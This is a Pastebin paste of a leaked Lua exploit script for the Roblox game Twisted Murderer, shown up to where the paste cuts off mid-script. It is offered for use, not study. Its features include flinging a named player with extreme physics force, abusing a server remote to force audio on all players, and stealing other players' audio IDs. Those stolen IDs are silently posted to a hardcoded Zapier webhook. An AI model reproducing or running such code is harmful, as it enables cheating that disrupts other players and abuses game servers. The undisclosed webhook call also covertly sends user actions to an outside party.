Advertisement
sinkicol

Twisted Murderer PAID XVA GUILEAKED BY ROMAN

May 30th, 2020
243
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 35.15 KB | None | 0 0
  1. if game:service("RunService"):IsStudio() then
  2. print("!STUDIO!")
  3. else
  4. if game:service("CoreGui"):FindFirstChild("XVA") then
  5. game.StarterGui:SetCore(
  6. "SendNotification",
  7. {
  8. Title = "Please Wait",
  9. Text = "Reloading GUI in 3 seconds",
  10. Icon = "rbxassetid://4879493225"
  11. }
  12. )
  13. wait(3)
  14. game:service("CoreGui"):FindFirstChild("XVA"):Destroy()
  15.  
  16. for i, v in pairs(game.CoreGui:GetDescendants()) do
  17. if v:IsA("TextLabel") and v.Text == "GUI" then
  18. print(v:GetFullName())
  19. end
  20. end
  21. end
  22. end
  23.  
  24. local XVA = Instance.new("ScreenGui")
  25. local Window = Instance.new("Frame")
  26. local Top = Instance.new("Frame")
  27. local MainTab = Instance.new("TextLabel")
  28. local CenterWindow = Instance.new("UIListLayout")
  29. local ContainerMenu = Instance.new("Frame")
  30. local UIPadding = Instance.new("UIPadding")
  31. local UIListLayout = Instance.new("UIListLayout")
  32. local FlingUsername = Instance.new("TextBox")
  33. local HashInput = Instance.new("TextBox")
  34. local ID = Instance.new("TextBox")
  35. local Steal = Instance.new("TextBox")
  36. local FollowUsername = Instance.new("TextBox")
  37. local Container = Instance.new("Frame")
  38. local Fling = Instance.new("TextButton")
  39. local ContainerLayout = Instance.new("UIListLayout")
  40. local ContainerPadding = Instance.new("UIPadding")
  41. local Hash = Instance.new("TextButton")
  42. local PlayId = Instance.new("TextButton")
  43. local StealId = Instance.new("TextButton")
  44. local Follow = Instance.new("TextButton")
  45. local UpDown = Instance.new("TextButton")
  46. local Weapons = Instance.new("Frame")
  47. local TopMenu = Instance.new("Frame")
  48. local WeaponTab = Instance.new("TextLabel")
  49. local CenterMenu = Instance.new("UIListLayout")
  50. local Menu = Instance.new("Frame")
  51. local MenuLayout = Instance.new("UIListLayout")
  52. local QuickscoperG = Instance.new("TextLabel")
  53. local TelsaG = Instance.new("TextLabel")
  54. local MLGG = Instance.new("TextLabel")
  55. local MidasTouchG = Instance.new("TextLabel")
  56. local IlluminatiG = Instance.new("TextLabel")
  57. local IlluminatiK = Instance.new("TextLabel")
  58. local QuickscoperK = Instance.new("TextLabel")
  59. local MLGK = Instance.new("TextLabel")
  60. local MidasTouchK = Instance.new("TextLabel")
  61. local MenuPadding = Instance.new("UIPadding")
  62. local TelsaK = Instance.new("TextLabel")
  63. local Buttons = Instance.new("Frame")
  64. local QuickscoperGun = Instance.new("TextButton")
  65. local WeaponLayout = Instance.new("UIListLayout")
  66. local TeslaGun = Instance.new("TextButton")
  67. local MLGGun = Instance.new("TextButton")
  68. local MidasTouchGun = Instance.new("TextButton")
  69. local IlluminatiGun = Instance.new("TextButton")
  70. local IlluminatiKnife = Instance.new("TextButton")
  71. local QuickscoperKnife = Instance.new("TextButton")
  72. local MLGKnife = Instance.new("TextButton")
  73. local MidasTouchKnife = Instance.new("TextButton")
  74. local WeaponPadding = Instance.new("UIPadding")
  75. local TeslaKnife = Instance.new("TextButton")
  76. local UpDownW = Instance.new("TextButton")
  77. local Minimized = true
  78. local enabled = true
  79.  
  80. XVA.Name = "XVA"
  81. XVA.Parent = game:GetService("CoreGui")
  82.  
  83. local UserInputService = game:GetService("UserInputService")
  84. local LocalPlayer = game:GetService("Players").LocalPlayer
  85. local lplayer = game:GetService("Players").LocalPlayer
  86. local mouse = game.Players.LocalPlayer:GetMouse()
  87. function GetPlayer(String)
  88. local Found = {}
  89. local strl = String:lower()
  90. if strl == "all" then
  91. for i, v in pairs(game:GetService("Players"):GetPlayers()) do
  92. table.insert(Found, v)
  93. end
  94. elseif strl == "others" then
  95. for i, v in pairs(game:GetService("Players"):GetPlayers()) do
  96. if v.Name ~= lplayer.Name then
  97. table.insert(Found, v)
  98. end
  99. end
  100. elseif strl == "me" then
  101. for i, v in pairs(game:GetService("Players"):GetPlayers()) do
  102. if v.Name == lplayer.Name then
  103. table.insert(Found, v)
  104. end
  105. end
  106. else
  107. for i, v in pairs(game:GetService("Players"):GetPlayers()) do
  108. if v.Name:lower():sub(1, #String) == String:lower() then
  109. table.insert(Found, v)
  110. end
  111. end
  112. end
  113. return Found
  114. end
  115.  
  116. mouse.KeyDown:connect(function(t)
  117. if t == "t" then
  118. Window.Visible = true
  119. Weapons.Visible = true
  120. else
  121. Window.Visible = false
  122. Weapons.Visible = false
  123. end
  124. end)
  125.  
  126. Window.Visible = false
  127. Weapons.Visible = false
  128.  
  129. Window.Name = "Window"
  130. Window.Parent = XVA
  131. Window.Active = true
  132. Window.AnchorPoint = Vector2.new(0, 0)
  133. Window.BackgroundColor3 = Color3.fromRGB(18, 18, 18)
  134. Window.BorderColor3 = Color3.fromRGB(18, 18, 18)
  135. Window.Position = UDim2.new(0.00464064628, 0, 0.0405405387, 0)
  136. Window.Size = UDim2.new(0, 212, 0, 143)
  137.  
  138. Top.Name = "Top"
  139. Top.Parent = Window
  140. Top.AnchorPoint = Vector2.new(0, 1)
  141. Top.BackgroundColor3 = Color3.fromRGB(18, 18, 18)
  142. Top.BorderColor3 = Color3.fromRGB(18, 18, 18)
  143. Top.Position = UDim2.new(0, 0, -0.00619288115, 0)
  144. Top.Size = UDim2.new(0, 212, 0, 19)
  145.  
  146. MainTab.Name = "Main Tab"
  147. MainTab.Parent = Top
  148. MainTab.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  149. MainTab.BackgroundTransparency = 1.000
  150. MainTab.BorderSizePixel = 0
  151. MainTab.Size = UDim2.new(0, 66, 0, 19)
  152. MainTab.Font = Enum.Font.SourceSans
  153. MainTab.Text = "Main Tab"
  154. MainTab.TextColor3 = Color3.fromRGB(244, 244, 244)
  155. MainTab.TextScaled = true
  156. MainTab.TextSize = 14.000
  157. MainTab.TextWrapped = true
  158.  
  159. CenterWindow.Name = "CenterWindow"
  160. CenterWindow.Parent = Top
  161. CenterWindow.SortOrder = Enum.SortOrder.LayoutOrder
  162.  
  163. ContainerMenu.Name = "ContainerMenu"
  164. ContainerMenu.Parent = Window
  165. ContainerMenu.BackgroundColor3 = Color3.fromRGB(25, 25, 25)
  166. ContainerMenu.BackgroundTransparency = 1.000
  167. ContainerMenu.BorderSizePixel = 0
  168. ContainerMenu.Size = UDim2.new(0, 212, 0, 143)
  169.  
  170. UIPadding.Parent = ContainerMenu
  171. UIPadding.PaddingTop = UDim.new(0, 8)
  172.  
  173. UIListLayout.Parent = ContainerMenu
  174. UIListLayout.SortOrder = Enum.SortOrder.LayoutOrder
  175. UIListLayout.Padding = UDim.new(0, 9)
  176.  
  177. FlingUsername.Name = "Fling Username"
  178. FlingUsername.Parent = ContainerMenu
  179. FlingUsername.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  180. FlingUsername.BackgroundTransparency = 1.000
  181. FlingUsername.BorderSizePixel = 0
  182. FlingUsername.Position = UDim2.new(0.0276480243, 0, 0.194539249, 0)
  183. FlingUsername.Size = UDim2.new(0, 114, 0, 17)
  184. FlingUsername.Font = Enum.Font.SourceSans
  185. FlingUsername.PlaceholderColor3 = Color3.fromRGB(62, 62, 62)
  186. FlingUsername.PlaceholderText = "Username"
  187. FlingUsername.Text = "Username"
  188. FlingUsername.TextColor3 = Color3.fromRGB(62, 62, 62)
  189. FlingUsername.TextScaled = true
  190. FlingUsername.TextSize = 14.000
  191. FlingUsername.TextWrapped = true
  192. FlingUsername.TextXAlignment = Enum.TextXAlignment.Left
  193.  
  194. HashInput.Name = "Hash Input"
  195. HashInput.Parent = ContainerMenu
  196. HashInput.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  197. HashInput.BackgroundTransparency = 1.000
  198. HashInput.BorderSizePixel = 0
  199. HashInput.Position = UDim2.new(0.0276480243, 0, 0.911262691, 0)
  200. HashInput.Size = UDim2.new(0, 114, 0, 16)
  201. HashInput.Font = Enum.Font.SourceSans
  202. HashInput.PlaceholderColor3 = Color3.fromRGB(62, 62, 62)
  203. HashInput.PlaceholderText = "Hash"
  204. HashInput.Text = "Hash"
  205. HashInput.TextColor3 = Color3.fromRGB(62, 62, 62)
  206. HashInput.TextScaled = true
  207. HashInput.TextSize = 14.000
  208. HashInput.TextWrapped = true
  209. HashInput.TextXAlignment = Enum.TextXAlignment.Left
  210.  
  211. ID.Name = "ID"
  212. ID.Parent = ContainerMenu
  213. ID.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  214. ID.BackgroundTransparency = 1.000
  215. ID.BorderSizePixel = 0
  216. ID.Position = UDim2.new(0.0276480243, 0, 0.737201273, 0)
  217. ID.Size = UDim2.new(0, 114, 0, 16)
  218. ID.Font = Enum.Font.SourceSans
  219. ID.PlaceholderColor3 = Color3.fromRGB(62, 62, 62)
  220. ID.PlaceholderText = "ID"
  221. ID.Text = ""
  222. ID.TextColor3 = Color3.fromRGB(62, 62, 62)
  223. ID.TextScaled = true
  224. ID.TextSize = 14.000
  225. ID.TextWrapped = true
  226. ID.TextXAlignment = Enum.TextXAlignment.Left
  227.  
  228. Steal.Name = "Steal"
  229. Steal.Parent = ContainerMenu
  230. Steal.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  231. Steal.BackgroundTransparency = 1.000
  232. Steal.BorderSizePixel = 0
  233. Steal.Position = UDim2.new(0.0276480243, 0, 0.819112539, 0)
  234. Steal.Size = UDim2.new(0, 114, 0, 16)
  235. Steal.Font = Enum.Font.SourceSans
  236. Steal.PlaceholderColor3 = Color3.fromRGB(62, 62, 62)
  237. Steal.PlaceholderText = "Steal Username"
  238. Steal.Text = "Steal Username"
  239. Steal.TextColor3 = Color3.fromRGB(62, 62, 62)
  240. Steal.TextScaled = true
  241. Steal.TextSize = 14.000
  242. Steal.TextWrapped = true
  243. Steal.TextXAlignment = Enum.TextXAlignment.Left
  244.  
  245. FollowUsername.Name = "Follow Username"
  246. FollowUsername.Parent = ContainerMenu
  247. FollowUsername.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  248. FollowUsername.BackgroundTransparency = 1.000
  249. FollowUsername.BorderSizePixel = 0
  250. FollowUsername.Position = UDim2.new(0.0276480243, 0, 0.112627983, 0)
  251. FollowUsername.Size = UDim2.new(0, 149, 0, 16)
  252. FollowUsername.Font = Enum.Font.SourceSans
  253. FollowUsername.PlaceholderColor3 = Color3.fromRGB(62, 62, 62)
  254. FollowUsername.PlaceholderText = "Follow Input"
  255. FollowUsername.Text = "Follow Input"
  256. FollowUsername.TextColor3 = Color3.fromRGB(62, 62, 62)
  257. FollowUsername.TextScaled = true
  258. FollowUsername.TextSize = 14.000
  259. FollowUsername.TextWrapped = true
  260. FollowUsername.TextXAlignment = Enum.TextXAlignment.Left
  261.  
  262. Container.Name = "Container"
  263. Container.Parent = Window
  264. Container.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  265. Container.BackgroundTransparency = 1.000
  266. Container.BorderSizePixel = 0
  267. Container.Position = UDim2.new(0.858490586, 0, 0.0402684547, 0)
  268. Container.Size = UDim2.new(0, 23, 0, 137)
  269.  
  270. Fling.Name = "Fling"
  271. Fling.Parent = Container
  272. Fling.BackgroundColor3 = Color3.fromRGB(170, 0, 0)
  273. Fling.BorderSizePixel = 0
  274. Fling.Position = UDim2.new(-0.0434782617, 0, 0.0218978096, 0)
  275. Fling.Size = UDim2.new(0, 22, 0, 21)
  276. Fling.Font = Enum.Font.SourceSans
  277. Fling.Text = ""
  278. Fling.TextColor3 = Color3.fromRGB(0, 0, 0)
  279. Fling.TextScaled = true
  280. Fling.TextSize = 14.000
  281. Fling.TextWrapped = true
  282. Fling.MouseButton1Click:Connect(
  283. function()
  284. if enabled then
  285. Fling.BackgroundColor3 = Color3.fromRGB(255, 55, 37)
  286. local target = unpack(GetPlayer(FlingUsername.Text)).Character
  287. local savepos = LocalPlayer.Character:FindFirstChild("HumanoidRootPart").CFrame
  288. lplayer.Character.Humanoid.PlatformStand = true
  289. local yeeting = true
  290. local coin = Instance.new("BodyThrust", lplayer.Character.HumanoidRootPart)
  291. coin.Force = Vector3.new(9e9, 9e9, 9e9)
  292. coin.Name = "Void"
  293. repeat
  294. lplayer.Character.HumanoidRootPart.CFrame = target.Head.CFrame
  295. coin.Location = target.Head.Position
  296. game:GetService("RunService").Heartbeat:wait()
  297. until not target.Head or yeeting == false
  298. if not target.Head or target.Character:FindFirstChild("Humanoid").Health <= 0 or LocalPlayer.Character == nil or LocalPlayer.Character:FindFirstChild("Humanoid").Health <= 0 or (target.Character:FindFirstChild("HumanoidRootPart").Velocity.magnitude - target.Character:FindFirstChild("Humanoid").WalkSpeed) > (target.Character:FindFirstChild("Humanoid").WalkSpeed + 20) or yeeting == false then
  299. LocalPlayer.Character:FindFirstChild("HumanoidRootPart").CFrame = savepos
  300. end
  301. end
  302. end)
  303. ContainerLayout.Name = "Container Layout"
  304. ContainerLayout.Parent = Container
  305. ContainerLayout.SortOrder = Enum.SortOrder.LayoutOrder
  306. ContainerLayout.Padding = UDim.new(0, 5)
  307.  
  308. ContainerPadding.Name = "Container Padding"
  309. ContainerPadding.Parent = Container
  310. ContainerPadding.PaddingBottom = UDim.new(0, 3)
  311.  
  312. Hash.Name = "Hash"
  313. Hash.Parent = Container
  314. Hash.BackgroundColor3 = Color3.fromRGB(170, 0, 0)
  315. Hash.BorderSizePixel = 0
  316. Hash.Position = UDim2.new(-0.0434782617, 0, 0.0218978096, 0)
  317. Hash.Size = UDim2.new(0, 22, 0, 21)
  318. Hash.Font = Enum.Font.SourceSans
  319. Hash.Text = ""
  320. Hash.TextColor3 = Color3.fromRGB(0, 0, 0)
  321. Hash.TextScaled = true
  322. Hash.TextSize = 14.000
  323. Hash.TextWrapped = true
  324. Hash.MouseButton1Click:connect(
  325. function()
  326. if enabled then
  327. Hash.BackgroundColor3=Color3.fromRGB(255, 55, 37)
  328. for i,v in pairs(game.Players:GetChildren()) do
  329. game.ReplicatedStorage.Event:FireServer("PlayRadio", v, HashInput.Text)
  330.  
  331. end
  332. else
  333. for i,v in pairs(game.Players:GetChildren()) do
  334. game.ReplicatedStorage.Event:FireServer("PlayRadio", v, 0)
  335. end
  336. end
  337. end)
  338. PlayId.Name = "PlayId"
  339. PlayId.Parent = Container
  340. PlayId.BackgroundColor3 = Color3.fromRGB(170, 0, 0)
  341. PlayId.BorderSizePixel = 0
  342. PlayId.Position = UDim2.new(-0.0434782617, 0, 0.0218978096, 0)
  343. PlayId.Size = UDim2.new(0, 22, 0, 21)
  344. PlayId.Font = Enum.Font.SourceSans
  345. PlayId.Text = ""
  346. PlayId.TextColor3 = Color3.fromRGB(0, 0, 0)
  347. PlayId.TextScaled = true
  348. PlayId.TextSize = 14.000
  349. PlayId.TextWrapped = true
  350. PlayId.MouseButton1Click:connect(
  351. function()
  352. if enabled then
  353. PlayId.BackgroundColor3= Color3.fromRGB(255, 55, 37)
  354. for i,v in pairs(game.Players:GetChildren()) do
  355. game.ReplicatedStorage.Event:FireServer("PlayRadio", v, ID.Text)
  356. end
  357. else
  358. for i,v in pairs(game.Players:GetChildren()) do
  359. game.ReplicatedStorage.Event:FireServer("PlayRadio", v, 0)
  360. end
  361. end
  362. end)
  363. StealId.Name = "Steal Id"
  364. StealId.Parent = Container
  365. StealId.BackgroundColor3 = Color3.fromRGB(170, 0, 0)
  366. StealId.BorderSizePixel = 0
  367. StealId.Position = UDim2.new(-0.0434782617, 0, 0.0218978096, 0)
  368. StealId.Size = UDim2.new(0, 22, 0, 21)
  369. StealId.Font = Enum.Font.SourceSans
  370. StealId.Text = ""
  371. StealId.TextColor3 = Color3.fromRGB(0, 0, 0)
  372. StealId.TextScaled = true
  373. StealId.TextSize = 14.000
  374. StealId.TextWrapped = true
  375. StealId.MouseButton1Click:connect(
  376. function()
  377. if enabled then
  378. StealId.BackgroundColor3=Color3.fromRGB(255, 55, 37)
  379. local audio = game.Workspace.Ignore.Players[Steal.Text].Torso.Music.SoundId
  380. Steal.Text = (audio)
  381. local url = "https://hooks.zapier.com/hooks/catch/7226320/o5ox7dd/"
  382. local data0 = {audio}
  383. local newdata0 = game:GetService "HttpService":JSONEncode(data0)
  384. game:HttpPost(url, newdata0)
  385. if Clipboard ~= nil then
  386. copy = Clipboard.set
  387. elseif Synapse ~= nil then
  388. copy = function(str)
  389. Synapse:Copy(str)
  390. end
  391. elseif setclipboard ~= nil then
  392. copy = setclipboard
  393. end
  394. copy(audio)
  395. game.StarterGui:SetCore(
  396. "SendNotification",
  397. {
  398. Title = "XVA GUI",
  399. Text = audio,
  400. Icon = "rbxassetid://4879493225"
  401. }
  402. )
  403.  
  404. for i, v in pairs(game.CoreGui:GetDescendants()) do
  405. if v:IsA("TextLabel") and v.Text == "XVA Console" then
  406. print(v:GetFullName())
  407. end
  408. end
  409. end
  410. end)
  411. Follow.Name = "Follow"
  412. Follow.Parent = Container
  413. Follow.BackgroundColor3 = Color3.fromRGB(170, 0, 0)
  414. Follow.BorderSizePixel = 0
  415. Follow.Position = UDim2.new(-0.0434782617, 0, 0.0218978096, 0)
  416. Follow.Size = UDim2.new(0, 22, 0, 21)
  417. Follow.Font = Enum.Font.SourceSans
  418. Follow.Text = ""
  419. Follow.TextColor3 = Color3.fromRGB(0, 0, 0)
  420. Follow.TextScaled = true
  421. Follow.TextSize = 14.000
  422. Follow.TextWrapped = true
  423. Follow.MouseButton1Down:connect(
  424. function()
  425. if enabled then
  426. Follow.BackgroundColor3=Color3.fromRGB(255, 55, 37)
  427. local function Attach(target, stand, player)
  428. local bp = Instance.new("BodyPosition")
  429. local bg = Instance.new("BodyGyro")
  430. stand.CanCollide = false
  431. local targetPlr = game.Players:GetPlayerFromCharacter(target)
  432. bg.D = 500
  433. bg.MaxTorque = Vector3.new(50000, 50000, 50000)
  434. bg.P = 10000
  435. bp.D = 1000
  436. bp.MaxForce = Vector3.new(25000, 25000, 25000)
  437. bp.P = 10000
  438. bg.Parent = stand
  439. bp.Parent = stand
  440. stand.CFrame = target.HumanoidRootPart.CFrame
  441. spawn(
  442. function()
  443. local backUpTarg = target
  444. while target do
  445. if target == player.Character then
  446. wait()
  447. else
  448. wait(.15)
  449. if player.Character then
  450. local dist =
  451. (player.Character.HumanoidRootPart.Position - target.HumanoidRootPart.Position).magnitude
  452. if dist > 35 then
  453. wait(.75)
  454. end
  455. end
  456. end
  457. bg.CFrame = target.HumanoidRootPart.CFrame
  458. bp.Position = CFrame.new(player.Character.PrimaryPart.CFrame * Vector3.new(2.5, 2, 2.5)).p
  459. end
  460. end
  461. )
  462. end
  463. Attach(
  464. unpack(GetPlayer(FollowUsername.Text)).Character,
  465. game.Players.LocalPlayer.Character.PrimaryPart,
  466. unpack(GetPlayer(FollowUsername.Text)))
  467. end
  468. end)
  469. UpDown.Name = "Up & Down"
  470. UpDown.Parent = Window
  471. UpDown.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  472. UpDown.BackgroundTransparency = 1.000
  473. UpDown.BorderSizePixel = 0
  474. UpDown.Position = UDim2.new(0.915, 0,-0.119, 0)
  475. UpDown.Rotation = 90.000
  476. UpDown.Size = UDim2.new(0, 18, 0, 13)
  477. UpDown.Font = Enum.Font.SourceSansBold
  478. UpDown.Text = ">"
  479. UpDown.TextColor3 = Color3.fromRGB(255, 255, 255)
  480. UpDown.TextScaled = true
  481. UpDown.TextSize = 14.000
  482. UpDown.TextWrapped = true
  483. UpDown.MouseButton1Click:connect(function()
  484. if Minimized then
  485. Window:TweenSize(UDim2.new(0, 212,0, 2), "InOut", "Quart", 1.5)
  486. Container.Visible = false
  487. ContainerMenu.Visible = false
  488. UpDown.Text = "<"
  489. else
  490. Window:TweenSize(UDim2.new(0, 212,0, 143), "Out", "Quart", 1.5)
  491. wait(1.6)
  492. Container.Visible = true
  493. ContainerMenu.Visible = true
  494. UpDown.Text = ">"
  495. end
  496. Minimized = not Minimized
  497. end)
  498. Weapons.Name = "Weapons"
  499. Weapons.Parent = XVA
  500. Weapons.Active = true
  501. Weapons.AnchorPoint = Vector2.new(0, 0)
  502. Weapons.BackgroundColor3 = Color3.fromRGB(18, 18, 18)
  503. Weapons.BorderColor3 = Color3.fromRGB(18, 18, 18)
  504. Weapons.Position = UDim2.new(0.138580069, 0, 0.0405405387, 0)
  505. Weapons.Size = UDim2.new(0, 212, 0, 313)
  506.  
  507. TopMenu.Name = "TopMenu"
  508. TopMenu.Parent = Weapons
  509. TopMenu.AnchorPoint = Vector2.new(0, 1)
  510. TopMenu.BackgroundColor3 = Color3.fromRGB(18, 18, 18)
  511. TopMenu.BorderColor3 = Color3.fromRGB(18, 18, 18)
  512. TopMenu.Position = UDim2.new(0, 0, -0.00619288115, 0)
  513. TopMenu.Size = UDim2.new(0, 212, 0, 19)
  514.  
  515. WeaponTab.Name = "WeaponTab"
  516. WeaponTab.Parent = TopMenu
  517. WeaponTab.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  518. WeaponTab.BackgroundTransparency = 1.000
  519. WeaponTab.BorderSizePixel = 0
  520. WeaponTab.Size = UDim2.new(0, 94, 0, 19)
  521. WeaponTab.Font = Enum.Font.SourceSans
  522. WeaponTab.Text = "Weapons Tab"
  523. WeaponTab.TextColor3 = Color3.fromRGB(244, 244, 244)
  524. WeaponTab.TextScaled = true
  525. WeaponTab.TextSize = 14.000
  526. WeaponTab.TextWrapped = true
  527.  
  528. CenterMenu.Name = "CenterMenu"
  529. CenterMenu.Parent = TopMenu
  530. CenterMenu.SortOrder = Enum.SortOrder.LayoutOrder
  531.  
  532. Menu.Name = "Menu"
  533. Menu.Parent = Weapons
  534. Menu.BackgroundColor3 = Color3.fromRGB(25, 25, 25)
  535. Menu.BackgroundTransparency = 1.000
  536. Menu.BorderSizePixel = 0
  537. Menu.Size = UDim2.new(0, 212, 0, 289)
  538.  
  539. MenuLayout.Name = "Menu Layout"
  540. MenuLayout.Parent = Menu
  541. MenuLayout.SortOrder = Enum.SortOrder.LayoutOrder
  542. MenuLayout.Padding = UDim.new(0, 9)
  543.  
  544. QuickscoperG.Name = "Quickscoper G"
  545. QuickscoperG.Parent = Menu
  546. QuickscoperG.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  547. QuickscoperG.BackgroundTransparency = 1.000
  548. QuickscoperG.BorderSizePixel = 0
  549. QuickscoperG.Position = UDim2.new(0, 0, 0.0536912754, 0)
  550. QuickscoperG.Size = UDim2.new(0, 149, 0, 19)
  551. QuickscoperG.Font = Enum.Font.SourceSans
  552. QuickscoperG.Text = "Quickscoper Gun"
  553. QuickscoperG.TextColor3 = Color3.fromRGB(56, 56, 56)
  554. QuickscoperG.TextScaled = true
  555. QuickscoperG.TextSize = 14.000
  556. QuickscoperG.TextWrapped = true
  557. QuickscoperG.TextXAlignment = Enum.TextXAlignment.Left
  558.  
  559. TelsaG.Name = "Telsa G"
  560. TelsaG.Parent = Menu
  561. TelsaG.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  562. TelsaG.BackgroundTransparency = 1.000
  563. TelsaG.BorderSizePixel = 0
  564. TelsaG.Position = UDim2.new(0, 0, 0.0536912754, 0)
  565. TelsaG.Size = UDim2.new(0, 149, 0, 19)
  566. TelsaG.Font = Enum.Font.SourceSans
  567. TelsaG.Text = "Tesla Gun"
  568. TelsaG.TextColor3 = Color3.fromRGB(56, 56, 56)
  569. TelsaG.TextScaled = true
  570. TelsaG.TextSize = 14.000
  571. TelsaG.TextWrapped = true
  572. TelsaG.TextXAlignment = Enum.TextXAlignment.Left
  573.  
  574. MLGG.Name = "MLG G"
  575. MLGG.Parent = Menu
  576. MLGG.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  577. MLGG.BackgroundTransparency = 1.000
  578. MLGG.BorderSizePixel = 0
  579. MLGG.Position = UDim2.new(0, 0, 0.0536912754, 0)
  580. MLGG.Size = UDim2.new(0, 149, 0, 19)
  581. MLGG.Font = Enum.Font.SourceSans
  582. MLGG.Text = "MLG Gun"
  583. MLGG.TextColor3 = Color3.fromRGB(56, 56, 56)
  584. MLGG.TextScaled = true
  585. MLGG.TextSize = 14.000
  586. MLGG.TextWrapped = true
  587. MLGG.TextXAlignment = Enum.TextXAlignment.Left
  588.  
  589. MidasTouchG.Name = "Midas Touch G"
  590. MidasTouchG.Parent = Menu
  591. MidasTouchG.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  592. MidasTouchG.BackgroundTransparency = 1.000
  593. MidasTouchG.BorderSizePixel = 0
  594. MidasTouchG.Position = UDim2.new(0, 0, 0.0536912754, 0)
  595. MidasTouchG.Size = UDim2.new(0, 149, 0, 19)
  596. MidasTouchG.Font = Enum.Font.SourceSans
  597. MidasTouchG.Text = "Midas Touch Gun"
  598. MidasTouchG.TextColor3 = Color3.fromRGB(56, 56, 56)
  599. MidasTouchG.TextScaled = true
  600. MidasTouchG.TextSize = 14.000
  601. MidasTouchG.TextWrapped = true
  602. MidasTouchG.TextXAlignment = Enum.TextXAlignment.Left
  603.  
  604. IlluminatiG.Name = "Illuminati G"
  605. IlluminatiG.Parent = Menu
  606. IlluminatiG.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  607. IlluminatiG.BackgroundTransparency = 1.000
  608. IlluminatiG.BorderSizePixel = 0
  609. IlluminatiG.Position = UDim2.new(0, 0, 0.0536912754, 0)
  610. IlluminatiG.Size = UDim2.new(0, 149, 0, 19)
  611. IlluminatiG.Font = Enum.Font.SourceSans
  612. IlluminatiG.Text = "Illuminati Gun"
  613. IlluminatiG.TextColor3 = Color3.fromRGB(56, 56, 56)
  614. IlluminatiG.TextScaled = true
  615. IlluminatiG.TextSize = 14.000
  616. IlluminatiG.TextWrapped = true
  617. IlluminatiG.TextXAlignment = Enum.TextXAlignment.Left
  618.  
  619. IlluminatiK.Name = "Illuminati K"
  620. IlluminatiK.Parent = Menu
  621. IlluminatiK.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  622. IlluminatiK.BackgroundTransparency = 1.000
  623. IlluminatiK.BorderSizePixel = 0
  624. IlluminatiK.Position = UDim2.new(0, 0, 0.0536912754, 0)
  625. IlluminatiK.Size = UDim2.new(0, 149, 0, 19)
  626. IlluminatiK.Font = Enum.Font.SourceSans
  627. IlluminatiK.Text = "Illuminati Knife"
  628. IlluminatiK.TextColor3 = Color3.fromRGB(56, 56, 56)
  629. IlluminatiK.TextScaled = true
  630. IlluminatiK.TextSize = 14.000
  631. IlluminatiK.TextWrapped = true
  632. IlluminatiK.TextXAlignment = Enum.TextXAlignment.Left
  633.  
  634. QuickscoperK.Name = "Quickscoper K"
  635. QuickscoperK.Parent = Menu
  636. QuickscoperK.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  637. QuickscoperK.BackgroundTransparency = 1.000
  638. QuickscoperK.BorderSizePixel = 0
  639. QuickscoperK.Position = UDim2.new(0, 0, 0.0536912754, 0)
  640. QuickscoperK.Size = UDim2.new(0, 149, 0, 19)
  641. QuickscoperK.Font = Enum.Font.SourceSans
  642. QuickscoperK.Text = "Quickscoper Knife"
  643. QuickscoperK.TextColor3 = Color3.fromRGB(56, 56, 56)
  644. QuickscoperK.TextScaled = true
  645. QuickscoperK.TextSize = 14.000
  646. QuickscoperK.TextWrapped = true
  647. QuickscoperK.TextXAlignment = Enum.TextXAlignment.Left
  648.  
  649. MLGK.Name = "MLG K"
  650. MLGK.Parent = Menu
  651. MLGK.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  652. MLGK.BackgroundTransparency = 1.000
  653. MLGK.BorderSizePixel = 0
  654. MLGK.Position = UDim2.new(0, 0, 0.0536912754, 0)
  655. MLGK.Size = UDim2.new(0, 149, 0, 19)
  656. MLGK.Font = Enum.Font.SourceSans
  657. MLGK.Text = "MLG Knife"
  658. MLGK.TextColor3 = Color3.fromRGB(56, 56, 56)
  659. MLGK.TextScaled = true
  660. MLGK.TextSize = 14.000
  661. MLGK.TextWrapped = true
  662. MLGK.TextXAlignment = Enum.TextXAlignment.Left
  663.  
  664. MidasTouchK.Name = "Midas Touch K"
  665. MidasTouchK.Parent = Menu
  666. MidasTouchK.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  667. MidasTouchK.BackgroundTransparency = 1.000
  668. MidasTouchK.BorderSizePixel = 0
  669. MidasTouchK.Position = UDim2.new(0, 0, 0.0536912754, 0)
  670. MidasTouchK.Size = UDim2.new(0, 149, 0, 19)
  671. MidasTouchK.Font = Enum.Font.SourceSans
  672. MidasTouchK.Text = "Midas Touch Knife"
  673. MidasTouchK.TextColor3 = Color3.fromRGB(56, 56, 56)
  674. MidasTouchK.TextScaled = true
  675. MidasTouchK.TextSize = 14.000
  676. MidasTouchK.TextWrapped = true
  677. MidasTouchK.TextXAlignment = Enum.TextXAlignment.Left
  678.  
  679. MenuPadding.Name = "Menu Padding"
  680. MenuPadding.Parent = Menu
  681. MenuPadding.PaddingTop = UDim.new(0, 8)
  682.  
  683. TelsaK.Name = "Telsa K"
  684. TelsaK.Parent = Menu
  685. TelsaK.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  686. TelsaK.BackgroundTransparency = 1.000
  687. TelsaK.BorderSizePixel = 0
  688. TelsaK.Position = UDim2.new(0, 0, 0.0536912754, 0)
  689. TelsaK.Size = UDim2.new(0, 149, 0, 19)
  690. TelsaK.Font = Enum.Font.SourceSans
  691. TelsaK.Text = "Tesla Knife"
  692. TelsaK.TextColor3 = Color3.fromRGB(56, 56, 56)
  693. TelsaK.TextScaled = true
  694. TelsaK.TextSize = 14.000
  695. TelsaK.TextWrapped = true
  696. TelsaK.TextXAlignment = Enum.TextXAlignment.Left
  697.  
  698. Buttons.Name = "Buttons"
